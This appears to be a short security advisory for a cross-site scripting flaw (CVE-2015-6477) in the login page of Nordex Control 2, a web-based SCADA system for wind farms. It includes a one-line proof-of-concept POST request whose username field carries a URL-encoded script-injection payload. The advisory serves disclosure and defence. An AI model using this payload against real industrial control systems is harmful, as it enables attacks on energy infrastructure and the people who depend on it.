Nordex NC2 XSS Vulnerability

2015.12.24
Credit: Karn Ganeshen
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2015-6477
CWE: CWE-79


Ogólna skala CVSS: 4.3/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Brak
Wpływ na integralność: Częściowy
Wpływ na dostępność: Brak

*Nordex NC2 XSS Vulnerability* *AFFECTED PRODUCTS* Nordex Control 2 (NC2) SCADA V16 and prior versions. Nordex is a company based in Germany that maintains offices in countries around the world. The affected product, Nordex Control 2, is a web-based SCADA system for wind power plants. According to Nordex, NC2 is deployed across the Energy sector. Nordex estimates that this product is used primarily in the United States, Europe, and China. *CVE-ID* CVE-2015-6477 *Reference* https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01 *Vulnerable parameter* username *PoC* POST /login HTTP/1.1 connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&pw=nordex&language=en -- Best Regards, Karn Ganeshen

Referencje:

https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top